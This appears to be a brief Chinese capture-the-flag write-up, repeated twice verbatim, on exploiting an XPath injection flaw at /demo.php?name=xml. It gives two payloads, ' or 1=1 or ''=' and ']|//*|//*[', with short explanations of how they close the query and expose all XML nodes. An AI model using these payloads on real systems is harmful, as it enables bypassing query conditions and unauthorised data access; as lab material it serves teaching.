网站网址为 /demo.php?name=xml ,可能存在XPath漏洞
在网址最后面加上 ' or 1=1 or ''=' 或者 ']|//*|//*['
' or 1=1 or ''='
闭合语句再绕过,类似于sql注入。
']|//*|//*['
xpath语法,访问xml的所有节点
类似sql注入,绕过查询 条件
秒解
网站网址为 /demo.php?name=xml ,可能存在XPath漏洞
在网址最后面加上 ' or 1=1 or ''=' 或者 ']|//*|//*['
' or 1=1 or ''='
闭合语句再绕过,类似于sql注入。
']|//*|//*['
xpath语法,访问xml的所有节点
类似sql注入,绕过查询 条件
秒解